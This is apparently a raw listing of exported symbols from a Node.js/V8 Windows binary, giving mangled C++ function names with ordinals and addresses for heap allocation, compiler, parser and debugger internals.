                                                                                                                                                                                                                                    ?AllocateRawWeakArrayList@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z32790x140b34650
                                                                                                                                                                                                                                    ?AllocateRawWithAllocationSite@Factory@internal@v8@@AEAA?AVHeapObject@23@V?$Handle@VMap@internal@v8@@@23@W4AllocationType@23@V?$Handle@VAllocationSite@internal@v8@@@23@@Z32800x140b20ae0
                                                                                                                                                                                                                                    ?AllocateRawWithImmortalMap@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@VMap@23@W4AllocationAlignment@23@@Z32810x140b34690
                                                                                                                                                                                                                                    ?AllocateRawWithImmortalMap@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@VMap@23@W4AllocationAlignment@23@@Z32820x140b346c0
                                                                                                                                                                                                                                    ?AllocateRawWithLightRetrySlowPath@HeapAllocator@internal@v8@@AEAA?AVAllocationResult@23@HW4AllocationType@23@W4AllocationOrigin@23@W4AllocationAlignment@23@@Z32830x140b17090
                                                                                                                                                                                                                                    ?AllocateRawWithRetryOrFailSlowPath@HeapAllocator@internal@v8@@AEAA?AVAllocationResult@23@HW4AllocationType@23@W4AllocationOrigin@23@W4AllocationAlignment@23@@Z32840x140b18110
                                                                                                                                                                                                                                    ?AllocateReceiver@DeclarationScope@internal@v8@@QEAAXXZ32850x140c63340
                                                                                                                                                                                                                                    ?AllocateRegion@RegionAllocator@base@v8@@QEAA_KPEAVRandomNumberGenerator@23@_K@Z32860x1410006b0
                                                                                                                                                                                                                                    ?AllocateRegion@RegionAllocator@base@v8@@QEAA_K_K00@Z32870x141000750
                                                                                                                                                                                                                                    ?AllocateRegion@RegionAllocator@base@v8@@QEAA_K_K@Z32880x141000850
                                                                                                                                                                                                                                    ?AllocateRegionAt@RegionAllocator@base@v8@@QEAA_N_K0W4RegionState@123@@Z32890x1410008e0
                                                                                                                                                                                                                                    ?AllocateRegister@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAXPEAVRegisterInfo@1234@@Z32900x140a37d60
                                                                                                                                                                                                                                    ?AllocateRegistersForTesting@Pipeline@compiler@internal@v8@@SA_NPEBVRegisterConfiguration@34@PEAVInstructionSequence@234@_N2@Z32910x141096590
                                                                                                                                                                                                                                    ?AllocateRegularInOldGenerationStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ32920x1410de8f0
                                                                                                                                                                                                                                    ?AllocateRegularInOldGenerationStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VCode@internal@v8@@@34@XZ32930x1410e1530
                                                                                                                                                                                                                                    ?AllocateRegularInYoungGenerationStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ32940x1410de940
                                                                                                                                                                                                                                    ?AllocateRegularInYoungGenerationStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VCode@internal@v8@@@34@XZ32950x1410e1580
                                                                                                                                                                                                                                    ?AllocateReservedEntry@ConstantArrayBuilder@interpreter@internal@v8@@AEAAIVSmi@34@@Z32960x140a34ec0
                                                                                                                                                                                                                                    ?AllocateSavedCalleeRegisterSlots@Frame@compiler@internal@v8@@QEAAXH@Z32970x14057e750
                                                                                                                                                                                                                                    ?AllocateSegment@AccountingAllocator@internal@v8@@QEAAPEAVSegment@23@_K_N@Z32980x1407ae7d0
                                                                                                                                                                                                                                    ?AllocateShared@AddressSpaceReservation@base@v8@@QEAA_NPEAX_KW4MemoryPermission@OS@23@_J1@Z32990x140ff3600
                                                                                                                                                                                                                                    ?AllocateShared@OS@base@v8@@CAPEAXPEAX_KW4MemoryPermission@123@_J1@Z33000x140ff3690
                                                                                                                                                                                                                                    ?AllocateSharedPages@PageAllocator@base@v8@@UEAA?AV?$unique_ptr@VSharedMemory@PageAllocator@v8@@U?$default_delete@VSharedMemory@PageAllocator@v8@@@std@@@std@@_KPEBX@Z33010x140097b60
                                                                                                                                                                                                                                    ?AllocateSharedPages@VirtualAddressSpace@base@v8@@UEAA_K_K0W4PagePermissions@3@_J0@Z33020x140ffc1e0
                                                                                                                                                                                                                                    ?AllocateSharedPages@VirtualAddressSubspace@base@v8@@UEAA_K_K0W4PagePermissions@3@_J0@Z33030x140ffc210
                                                                                                                                                                                                                                    ?AllocateSourceRangeMap@ParseInfo@internal@v8@@QEAAXXZ33040x1408c8950
                                                                                                                                                                                                                                    ?AllocateSpillSlot@Frame@compiler@internal@v8@@QEAAHHH@Z33050x14057e760
                                                                                                                                                                                                                                    ?AllocateStackSlot@Scope@internal@v8@@AEAAXPEAVVariable@23@@Z33060x140c63420
                                                                                                                                                                                                                                    ?AllocateStackSpace@TurboAssembler@internal@v8@@QEAAXH@Z33070x1405f3f50
                                                                                                                                                                                                                                    ?AllocateStackSpace@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z33080x1405f4060
                                                                                                                                                                                                                                    ?AllocateSubspace@VirtualAddressSpace@base@v8@@UEAA?AV?$unique_ptr@VVirtualAddressSpace@v8@@U?$default_delete@VVirtualAddressSpace@v8@@@std@@@std@@_K00W4PagePermissions@3@@Z33090x140ffc2e0
                                                                                                                                                                                                                                    ?AllocateSubspace@VirtualAddressSubspace@base@v8@@UEAA?AV?$unique_ptr@VVirtualAddressSpace@v8@@U?$default_delete@VVirtualAddressSpace@v8@@@std@@@std@@_K00W4PagePermissions@3@@Z33100x140ffc370
                                                                                                                                                                                                                                    ?AllocateUnaligned@AlignedSlotAllocator@internal@v8@@QEAAHH@Z33110x140c0f850
                                                                                                                                                                                                                                    ?AllocateVariables@DeclarationScope@internal@v8@@AEAA_NPEAVParseInfo@23@@Z33120x140c63490
                                                                                                                                                                                                                                    ?AllocateVariablesRecursively@Scope@internal@v8@@AEAAXXZ33130x140c63540
                                                                                                                                                                                                                                    ?AllocateWasmMemory@BackingStore@internal@v8@@SA?AV?$unique_ptr@VBackingStore@internal@v8@@U?$default_delete@VBackingStore@internal@v8@@@std@@@std@@PEAVIsolate@23@_K1W4SharedFlag@23@@Z33140x140a063b0
                                                                                                                                                                                                                                    ?AllocatedBytesAtLastGC@BasePage@internal@cppgc@@QEBA_KXZ33150x14051a120
                                                                                                                                                                                                                                    ?AllocatedBytesAtLastGC@LargePage@internal@cppgc@@QEBA_KXZ33160x140504930
                                                                                                                                                                                                                                    ?AllocatedBytesAtLastGC@NormalPage@internal@cppgc@@QEBA_KXZ33170x140097b30
                                                                                                                                                                                                                                    ?AllocatedExternalMemorySinceMarkCompact@Heap@internal@v8@@AEAA_KXZ33180x140aff180
                                                                                                                                                                                                                                    ?AllocatedObjectSizeDecreased@CppHeap@internal@v8@@UEAAX_K@Z33190x140b3eb00
                                                                                                                                                                                                                                    ?AllocatedObjectSizeIncreased@CppHeap@internal@v8@@UEAAX_K@Z33200x140b3eb10
                                                                                                                                                                                                                                    ?AllocatedObjectSizeSafepointImpl@StatsCollector@internal@cppgc@@AEAAXXZ33210x140509370
                                                                                                                                                                                                                                    ?AllocatedSinceLastGC@NewSpace@internal@v8@@QEBA_KXZ33220x14053e110
                                                                                                                                                                                                                                    ?AllocationSize@LargePage@internal@cppgc@@SA_K_K@Z33230x140504020
                                                                                                                                                                                                                                    ?AllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANN@Z33240x140b1a050
                                                                                                                                                                                                                                    ?AllocationTypeForInPlaceInternalizableString@Factory@internal@v8@@AEAA?AW4AllocationType@23@XZ33250x140b20eb0
                                                                                                                                                                                                                                    ?AllocationTypeForInPlaceInternalizableString@LocalFactory@internal@v8@@AEAA?AW4AllocationType@23@XZ33260x1407df2a0
                                                                                                                                                                                                                                    ?AllocatorLimitOnMaxOldGenerationSize@Heap@internal@v8@@SA_KXZ33270x140aff360
                                                                                                                                                                                                                                    ?AllowCodeGenerationFromStrings@Context@v8@@QEAAX_N@Z33280x140c78840
                                                                                                                                                                                                                                    ?AllowVarArgs@?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@SA_NXZ33290x140098380
                                                                                                                                                                                                                                    ?AllowVarArgs@?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@SA_NXZ33300x140098380
                                                                                                                                                                                                                                    ?AllowVarArgs@?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@SA_NXZ33310x140098380
                                                                                                                                                                                                                                    ?AllowVarArgs@?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@SA_NXZ33320x140098380
                                                                                                                                                                                                                                    ?AllowVarArgs@?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@SA_NXZ33330x140098380
                                                                                                                                                                                                                                    ?AllowVarArgs@?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@SA_NXZ33340x140098380
                                                                                                                                                                                                                                    ?AllowVarArgs@CallInterfaceDescriptor@internal@v8@@QEBA_NXZ33350x14057e800
                                                                                                                                                                                                                                    ?AllowWasmCodeGenerationCallback@node@@YA_NV?$Local@VContext@v8@@@v8@@V?$Local@VString@v8@@@3@@Z33360x14029d9f0
                                                                                                                                                                                                                                    ?AllowsLazyCompilation@DeclarationScope@internal@v8@@QEBA_NXZ33370x140c635a0
                                                                                                                                                                                                                                    ?AllowsLazyParsingWithoutUnresolvedVariables@Parser@internal@v8@@AEBA_NXZ33380x14088d220
                                                                                                                                                                                                                                    ?AllowsLazyParsingWithoutUnresolvedVariables@Scope@internal@v8@@QEBA_NPEBV123@@Z33390x140c635c0
                                                                                                                                                                                                                                    ?Ambiguous@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB33400x142298c68
                                                                                                                                                                                                                                    ?AmountOfPhysicalMemory@SysInfo@base@v8@@SA_JXZ33410x140ffff70
                                                                                                                                                                                                                                    ?AmountOfVirtualMemory@SysInfo@base@v8@@SA_JXZ33420x140098360
                                                                                                                                                                                                                                    ?Analyze@BytecodeAnalysis@compiler@internal@v8@@AEAAXXZ33430x1412472f0
                                                                                                                                                                                                                                    ?Analyze@DeclarationScope@internal@v8@@SA_NPEAVParseInfo@23@@Z33440x140c635f0
                                                                                                                                                                                                                                    ?AnalyzeLoopAssignmentForTesting@wasm@internal@v8@@YAPEAVBitVector@23@PEAVZone@23@IPEBE1@Z33450x1406bf0a0
                                                                                                                                                                                                                                    ?AnalyzePartially@DeclarationScope@internal@v8@@QEAAXPEAVParser@23@PEAVAstNodeFactory@23@_N@Z33460x140c636c0
                                                                                                                                                                                                                                    ?AnalyzePartially@Scope@internal@v8@@AEAAXPEAVDeclarationScope@23@PEAVAstNodeFactory@23@PEAV?$ThreadedListBase@VVariableProxy@internal@v8@@UEmptyBase@base@3@UUnresolvedNext@123@@base@3@_N@Z33470x140c63810
                                                                                                                                                                                                                                    ?And@SharedTurboAssembler@internal@v8@@QEAAXVRegister@23@VImmediate@23@@Z33480x140611860
                                                                                                                                                                                                                                    ?AnnotateStrongRetainer@GlobalHandles@internal@v8@@SAXPEA_KPEBD@Z33490x140098040
                                                                                                                                                                                                                                    ?AnnotateStrongRetainer@api_internal@v8@@YAXPEA_KPEBD@Z33500x140c78920
                                                                                                                                                                                                                                    ?Any@FieldType@internal@v8@@SA?AV?$Handle@VFieldType@internal@v8@@@23@PEAVIsolate@23@@Z33510x1409a8330
                                                                                                                                                                                                                                    ?Any@Type@compiler@internal@v8@@SA?AV1234@XZ33520x14057e810
                                                                                                                                                                                                                                    ?ApiGetter@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z33530x140c0cd60
                                                                                                                                                                                                                                    ?Append@FreeList@internal@cppgc@@QEAAX$$QEAV123@@Z33540x14051caf0
                                                                                                                                                                                                                                    ?AppendAsTraceFormat@TracedValue@tracing@v8@@UEBAXPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z33550x1407bdcb0
                                                                                                                                                                                                                                    ?AppendBoolean@TracedValue@tracing@v8@@QEAAX_N@Z33560x1407bdd60
                                                                                                                                                                                                                                    ?AppendDeoptimizeArguments@InstructionSelector@compiler@internal@v8@@AEAAXPEAV?$ZoneVector@VInstructionOperand@compiler@internal@v8@@@34@W4DeoptimizeReason@34@IAEBUFeedbackSource@234@VFrameState@234@@Z33570x14105c270
                                                                                                                                                                                                                                    ?AppendDouble@TracedValue@tracing@v8@@QEAAXN@Z33580x1407bddf0
                                                                                                                                                                                                                                    ?AppendInput@Node@compiler@internal@v8@@QEAAXPEAVZone@34@PEAV1234@@Z33590x14102a370
                                                                                                                                                                                                                                    ?AppendInteger@TracedValue@tracing@v8@@QEAAXH@Z33600x1407bded0
                                                                                                                                                                                                                                    ?AppendNaryOperationSourceRange@Parser@internal@v8@@AEAAXPEAVNaryOperation@23@AEBUSourceRange@23@@Z33610x14088d260
                                                                                                                                                                                                                                    ?AppendPhiInput@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@0@Z33620x141218140
                                                                                                                                                                                                                                    ?AppendString@TracedValue@tracing@v8@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z33630x1407bdfb0
                                                                                                                                                                                                                                    ?AppendString@TracedValue@tracing@v8@@QEAAXPEBD@Z33640x1407bdfc0
                                                                                                                                                                                                                                    ?AppendUse@Node@compiler@internal@v8@@AEAAXPEAUUse@1234@@Z33650x14102a5c0
                                                                                                                                                                                                                                    ?Apply@BookmarkScope@Scanner@internal@v8@@QEAAXXZ33660x14087eb60
                                                                                                                                                                                                                                    ?ApplyBreakPoints@Debug@internal@v8@@AEAAXV?$Handle@VDebugInfo@internal@v8@@@23@@Z33670x140bb72b0
                                                                                                                                                                                                                                    ?ApplyDebugBreak@BytecodeArrayIterator@interpreter@internal@v8@@QEAAXXZ33680x140a53470
                                                                                                                                                                                                                                    ?ApplyForwarding@JumpThreading@compiler@internal@v8@@SAXPEAVZone@34@AEBV?$ZoneVector@VRpoNumber@compiler@internal@v8@@@34@PEAVInstructionSequence@234@@Z33690x1410f5cd0
                                                                                                                                                                                                                                    ?ApplyPersistentHandleVisitor@GlobalHandles@internal@v8@@AEAAXPEAVPersistentHandleVisitor@3@PEAVNode@123@@Z33700x140b4c0a0
                                                                                                                                                                                                                                    ?ApplySideEffectChecks@Debug@internal@v8@@QEAAXV?$Handle@VDebugInfo@internal@v8@@@23@@Z33710x140bb7440
                                                                                                                                                                                                                                    ?ApplyTransitionToDataProperty@LookupIterator@internal@v8@@QEAAXV?$Handle@VJSReceiver@internal@v8@@@23@@Z33720x140932f00
                                                                                                                                                                                                                                    ?ArchiveDebug@Debug@internal@v8@@QEAAPEADPEAD@Z33730x140bb74d0
                                                                                                                                                                                                                                    ?ArchiveSpacePerThread@Debug@internal@v8@@SAHXZ33740x1400c97c0
                                                                                                                                                                                                                                    ?ArchiveSpacePerThread@Isolate@internal@v8@@SAHXZ33750x14012e700
                                                                                                                                                                                                                                    ?ArchiveSpacePerThread@StackGuard@internal@v8@@SAHXZ33760x1400c5cd0
                                                                                                                                                                                                                                    ?ArchiveStackGuard@StackGuard@internal@v8@@QEAAPEADPEAD@Z33770x140b58350
                                                                                                                                                                                                                                    ?ArchiveThread@Isolate@internal@v8@@QEAAPEADPEAD@Z33780x140b64a90
                                                                                                                                                                                                                                    ?AreAliases@RegisterConfiguration@internal@v8@@QEBA_NW4MachineRepresentation@23@H0H@Z33790x140bdf4b0
                                                                                                                                                                                                                                    ?AreContiguous@Register@interpreter@internal@v8@@SA_NV1234@0000@Z33800x140a37640
                                                                                                                                                                                                                                    ?AreKeysEqual@StateValuesCache@compiler@internal@v8@@CA_NPEAX0@Z33810x1410dfce0
                                                                                                                                                                                                                                    ?AreMovesRedundant@Instruction@compiler@internal@v8@@QEBA_NXZ33820x141031d00
                                                                                                                                                                                                                                    ?AreSourcePositionsAvailable@FrameSummary@internal@v8@@QEBA_NXZ33830x140b7a510
                                                                                                                                                                                                                                    ?AreValueKeysEqual@StateValuesCache@compiler@internal@v8@@CA_NPEAUStateValuesKey@1234@0@Z33840x1410dfd20
                                                                                                                                                                                                                                    ?AreWasmExceptionsEnabled@Isolate@internal@v8@@QEAA_NV?$Handle@VContext@internal@v8@@@23@@Z33850x140b64b20
                                                                                                                                                                                                                                    ?AreaSize@PagedSpace@internal@v8@@QEBAHXZ33860x14053e1c0
                                                                                                                                                                                                                                    ?ArgumentCount@CFunction@v8@@QEBAIXZ33870x140098be0
                                                                                                                                                                                                                                    ?ArgumentCount@CFunctionInfo@v8@@QEBAIXZ33880x140098b70
                                                                                                                                                                                                                                    ?ArgumentInfo@CFunction@v8@@QEBAAEBVCTypeInfo@2@I@Z33890x140098bd0
                                                                                                                                                                                                                                    ?ArgumentInfo@CFunctionInfo@v8@@QEBAAEBVCTypeInfo@2@I@Z33900x140c78a80
                                                                                                                                                                                                                                    ?ArgumentStackSlotsForCFunctionCall@TurboAssembler@internal@v8@@QEAAHH@Z33910x1405f41d0
                                                                                                                                                                                                                                    ?Arguments@AsmFunctionType@wasm@internal@v8@@QEBA?BV?$ZoneVector@PEAVAsmType@wasm@internal@v8@@@34@XZ33920x14072f3d0
                                                                                                                                                                                                                                    ?ArgumentsElementsState@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CreateArgumentsType@34@@Z33930x1410395c0
                                                                                                                                                                                                                                    ?ArgumentsLength@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ33940x1410d4df0
                                                                                                                                                                                                                                    ?ArgumentsLengthState@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ33950x141039660
                                                                                                                                                                                                                                    ?Arguments_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ33960x14053e1d0
                                                                                                                                                                                                                                    ?Arguments_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ33970x1407df2b0
                                                                                                                                                                                                                                    ?Array@Type@compiler@internal@v8@@SA?AV1234@XZ33980x14057e820
                                                                                                                                                                                                                                    ?ArrayBuffer_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ33990x14053e1e0
                                                                                                                                                                                                                                    ?ArrayBuffer_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ34000x1407df2c0
                                                                                                                                                                                                                                    ?ArrayConstructorStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ34010x1410de990
                                                                                                                                                                                                                                    ?ArrayIterator_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ34020x14053e1f0
                                                                                                                                                                                                                                    ?ArrayIterator_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ34030x1407df2d0
                                                                                                                                                                                                                                    ?ArrayLiteralFromListWithSpread@Parser@internal@v8@@AEAAPEAVArrayLiteral@23@AEBV?$ScopedList@PEAVExpression@internal@v8@@PEAX@23@@Z34040x1408b9bf0
                                                                                                                                                                                                                                    ?ArrayNoArgumentConstructor@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ElementsKind@23@W4AllocationSiteOverrideMode@23@@Z34050x140c0cd80
                                                                                                                                                                                                                                    ?ArrayOrOtherObject@Type@compiler@internal@v8@@SA?AV1234@XZ34060x14057e830
                                                                                                                                                                                                                                    ?ArrayOrProxy@Type@compiler@internal@v8@@SA?AV1234@XZ34070x14057e840
                                                                                                                                                                                                                                    ?ArraySingleArgumentConstructor@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ElementsKind@23@W4AllocationSiteOverrideMode@23@@Z34080x140c0ceb0
                                                                                                                                                                                                                                    ?Array_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ34090x14053e200
                                                                                                                                                                                                                                    ?Array_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ34100x1407df2e0
                                                                                                                                                                                                                                    ?AsAccessorInfo@ObjectRef@compiler@internal@v8@@QEBA?AVAccessorInfoRef@234@XZ34110x1410147f0
                                                                                                                                                                                                                                    ?AsAllocationSite@ObjectRef@compiler@internal@v8@@QEBA?AVAllocationSiteRef@234@XZ34120x1410148a0
                                                                                                                                                                                                                                    ?AsArray@Map@v8@@QEBA?AV?$Local@VArray@v8@@@2@XZ34130x140c78a90
                                                                                                                                                                                                                                    ?AsArray@Set@v8@@QEBA?AV?$Local@VArray@v8@@@2@XZ34140x140c78b10
                                                                                                                                                                                                                                    ?AsArrayBoilerplateDescription@ObjectRef@compiler@internal@v8@@QEBA?AVArrayBoilerplateDescriptionRef@234@XZ34150x141014950
                                                                                                                                                                                                                                    ?AsBase@CppHeap@internal@v8@@QEAAAEAVHeapBase@2cppgc@@XZ34160x1400972c0
                                                                                                                                                                                                                                    ?AsBase@CppHeap@internal@v8@@QEBAAEBVHeapBase@2cppgc@@XZ34170x1400972c0
                                                                                                                                                                                                                                    ?AsBase@Heap@internal@cppgc@@QEAAAEAVHeapBase@23@XZ34180x1400972c0
                                                                                                                                                                                                                                    ?AsBase@Heap@internal@cppgc@@QEBAAEBVHeapBase@23@XZ34190x1400972c0
                                                                                                                                                                                                                                    ?AsBigInt@ObjectRef@compiler@internal@v8@@QEBA?AVBigIntRef@234@XZ34200x141014a00
                                                                                                                                                                                                                                    ?AsBitset@Type@compiler@internal@v8@@AEBA_KXZ34210x14057e850
                                                                                                                                                                                                                                    ?AsBitsetForTesting@Type@compiler@internal@v8@@QEAA_KXZ34220x14057e850
                                                                                                                                                                                                                                    ?AsBytecodeArray@ObjectRef@compiler@internal@v8@@QEBA?AVBytecodeArrayRef@234@XZ34230x141014a80
                                                                                                                                                                                                                                    ?AsCallHandlerInfo@ObjectRef@compiler@internal@v8@@QEBA?AVCallHandlerInfoRef@234@XZ34240x141014b30
                                                                                                                                                                                                                                    ?AsCallableType@AsmType@wasm@internal@v8@@QEAAPEAVAsmCallableType@234@XZ34250x14072f490
                                                                                                                                                                                                                                    ?AsCell@ObjectRef@compiler@internal@v8@@QEBA?AVCellRef@234@XZ34260x141014be0
                                                                                                                                                                                                                                    ?AsClassScope@Scope@internal@v8@@QEAAPEAVClassScope@23@XZ34270x1400972c0
                                                                                                                                                                                                                                    ?AsClassScope@Scope@internal@v8@@QEBAPEBVClassScope@23@XZ34280x1400972c0
                                                                                                                                                                                                                                    ?AsCode@ObjectRef@compiler@internal@v8@@QEBA?AVCodeRef@234@XZ34290x141014c90
                                                                                                                                                                                                                                    ?AsCodeDataContainer@ObjectRef@compiler@internal@v8@@QEBA?AVCodeDataContainerRef@234@XZ34300x141014d40
                                                                                                                                                                                                                                    ?AsContext@ObjectRef@compiler@internal@v8@@QEBA?AVContextRef@234@XZ34310x141014df0
                                                                                                                                                                                                                                    ?AsDeclarationScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ34320x1400972c0
                                                                                                                                                                                                                                    ?AsDeclarationScope@Scope@internal@v8@@QEBAPEBVDeclarationScope@23@XZ34330x1400972c0
                                                                                                                                                                                                                                    ?AsDescriptorArray@ObjectRef@compiler@internal@v8@@QEBA?AVDescriptorArrayRef@234@XZ34340x141014ea0
                                                                                                                                                                                                                                    ?AsDouble@AsmJsScanner@internal@v8@@QEBANXZ34350x1407339d0
                                                                                                                                                                                                                                    ?AsElementsKind@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@W4ElementsKind@23@@Z34360x140926310
                                                                                                                                                                                                                                    ?AsElementsKind@MapRef@compiler@internal@v8@@QEBA?AV?$Optional@VMapRef@compiler@internal@v8@@@base@4@W4ElementsKind@34@@Z34370x141014f50
                                                                                                                                                                                                                                    ?AsFeedbackCell@ObjectRef@compiler@internal@v8@@QEBA?AVFeedbackCellRef@234@XZ34380x1410151e0
                                                                                                                                                                                                                                    ?AsFeedbackVector@ObjectRef@compiler@internal@v8@@QEBA?AVFeedbackVectorRef@234@XZ34390x141015290
                                                                                                                                                                                                                                    ?AsFixedArray@ObjectRef@compiler@internal@v8@@QEBA?AVFixedArrayRef@234@XZ34400x141015340
                                                                                                                                                                                                                                    ?AsFixedArrayBase@ObjectRef@compiler@internal@v8@@QEBA?AVFixedArrayBaseRef@234@XZ34410x141015410
                                                                                                                                                                                                                                    ?AsFixedDoubleArray@ObjectRef@compiler@internal@v8@@QEBA?AVFixedDoubleArrayRef@234@XZ34420x1410154e0
                                                                                                                                                                                                                                    ?AsFunctionTemplateInfo@ObjectRef@compiler@internal@v8@@QEBA?AVFunctionTemplateInfoRef@234@XZ34430x141015590
                                                                                                                                                                                                                                    ?AsFunctionType@AsmCallableType@wasm@internal@v8@@UEAAPEAVAsmFunctionType@234@XZ34440x140098360
                                                                                                                                                                                                                                    ?AsFunctionType@AsmFunctionType@wasm@internal@v8@@UEAAPEAV1234@XZ34450x1400972c0
                                                                                                                                                                                                                                    ?AsFunctionType@AsmType@wasm@internal@v8@@QEAAPEAVAsmFunctionType@234@XZ34460x14072f4b0
                                                                                                                                                                                                                                    ?AsHeap@LocalHeap@internal@v8@@QEAAPEAVHeap@23@XZ34470x140097290
                                                                                                                                                                                                                                    ?AsHeapConstant@Type@compiler@internal@v8@@QEBAPEBVHeapConstantType@234@XZ34480x140097290
                                                                                                                                                                                                                                    ?AsHeapNumber@ObjectRef@compiler@internal@v8@@QEBA?AVHeapNumberRef@234@XZ34490x141015640
                                                                                                                                                                                                                                    ?AsHeapObject@ObjectRef@compiler@internal@v8@@QEBA?AVHeapObjectRef@234@XZ34500x141014950
                                                                                                                                                                                                                                    ?AsIdentifier@Parser@internal@v8@@CAPEBVAstRawString@23@PEAVExpression@23@@Z34510x14088d2c0
                                                                                                                                                                                                                                    ?AsIdentifierExpression@Parser@internal@v8@@AEAAPEAVVariableProxy@23@PEAVExpression@23@@Z34520x14088d2f0
                                                                                                                                                                                                                                    ?AsInt64@BigInt@internal@v8@@QEAA_JPEA_N@Z34530x140a01c60
                                                                                                                                                                                                                                    ?AsInternalizedString@ObjectRef@compiler@internal@v8@@QEBA?AVInternalizedStringRef@234@XZ34540x141015770
                                                                                                                                                                                                                                    ?AsIsolate@Isolate@internal@v8@@QEAAPEAV123@XZ34550x1400972c0
                                                                                                                                                                                                                                    ?AsIsolate@LocalIsolate@internal@v8@@QEAAPEAVIsolate@23@XZ34560x14033c7b0
                                                                                                                                                                                                                                    ?AsIterationStatement@Parser@internal@v8@@AEAAPEAVIterationStatement@23@PEAVBreakableStatement@23@@Z34570x14088d310
                                                                                                                                                                                                                                    ?AsJSArray@ObjectRef@compiler@internal@v8@@QEBA?AVJSArrayRef@234@XZ34580x141015820
                                                                                                                                                                                                                                    ?AsJSBoundFunction@ObjectRef@compiler@internal@v8@@QEBA?AVJSBoundFunctionRef@234@XZ34590x1410158a0
                                                                                                                                                                                                                                    ?AsJSDataView@ObjectRef@compiler@internal@v8@@QEBA?AVJSDataViewRef@234@XZ34600x141015920
                                                                                                                                                                                                                                    ?AsJSFunction@ObjectRef@compiler@internal@v8@@QEBA?AVJSFunctionRef@234@XZ34610x141015a50
                                                                                                                                                                                                                                    ?AsJSGlobalObject@ObjectRef@compiler@internal@v8@@QEBA?AVJSGlobalObjectRef@234@XZ34620x141015b20
                                                                                                                                                                                                                                    ?AsJSGlobalProxy@ObjectRef@compiler@internal@v8@@QEBA?AVJSGlobalProxyRef@234@XZ34630x141015ba0
                                                                                                                                                                                                                                    ?AsJSON@compiler@internal@v8@@YA?AUGraphAsJSON@123@AEBVGraph@123@PEAVSourcePositionTable@123@PEAVNodeOriginTable@123@@Z34640x140537de0
                                                                                                                                                                                                                                    ?AsJSON@compiler@internal@v8@@YA?AUNodeOriginAsJSON@123@AEBVNodeOrigin@123@@Z34650x140097ad0
                                                                                                                                                                                                                                    ?AsJSON@compiler@internal@v8@@YA?AUSourcePositionAsJSON@123@AEBVSourcePosition@23@@Z34660x140097ad0
                                                                                                                                                                                                                                    ?AsJSObject@ObjectRef@compiler@internal@v8@@QEBA?AVJSObjectRef@234@XZ34670x141015c20
                                                                                                                                                                                                                                    ?AsJSReceiver@ObjectRef@compiler@internal@v8@@QEBA?AVJSReceiverRef@234@XZ34680x141015ca0
                                                                                                                                                                                                                                    ?AsJSTypedArray@ObjectRef@compiler@internal@v8@@QEBA?AVJSTypedArrayRef@234@XZ34690x141015d20
                                                                                                                                                                                                                                    ?AsJavaScript@FrameSummary@internal@v8@@QEBAAEBVJavaScriptFrameSummary@123@XZ34700x1400972c0
                                                                                                                                                                                                                                    ?AsLocalIsolate@Isolate@internal@v8@@QEAAPEAVLocalIsolate@23@XZ34710x14053e210
                                                                                                                                                                                                                                    ?AsLocalIsolate@LocalIsolate@internal@v8@@QEAAPEAV123@XZ34720x1400972c0
                                                                                                                                                                                                                                    ?AsMap@ObjectRef@compiler@internal@v8@@QEBA?AVMapRef@234@XZ34730x141015e20
                                                                                                                                                                                                                                    ?AsModuleScope@Scope@internal@v8@@QEAAPEAVModuleScope@23@XZ34740x1400972c0
                                                                                                                                                                                                                                    ?AsModuleScope@Scope@internal@v8@@QEBAPEBVModuleScope@23@XZ34750x1400972c0
                                                                                                                                                                                                                                    ?AsName@ObjectRef@compiler@internal@v8@@QEBA?AVNameRef@234@XZ34760x141015ed0
                                                                                                                                                                                                                                    ?AsNativeContext@ObjectRef@compiler@internal@v8@@QEBA?AVNativeContextRef@234@XZ34770x141015f80
